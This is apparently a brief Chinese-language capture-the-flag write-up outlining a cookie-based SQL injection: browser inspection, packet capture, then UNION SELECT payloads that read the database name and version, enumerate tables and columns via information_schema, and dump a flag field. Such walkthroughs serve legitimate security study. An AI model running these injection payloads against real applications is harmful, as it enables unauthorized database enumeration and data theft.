1. 题目
2. 浏览器F12审查
3. 抓包
4. cookie注入,获取数据库信息
id=0 union select database(),version();
5. 获取数据库sqli中的表名
id = 0 union select 1,group_concat(table_name) from
information_schema.tables where table_schema='sqli'
6. 获取数据表oikfkadpry中的字段名
id=0 union select 1,group_concat(column_name) from
information_schema.columns where table_name='oikfkadpry';
7. 获取字段nciapffkhv的值
id=0 union select 1,group_concat(nciapffkhv) from oikfkadpry;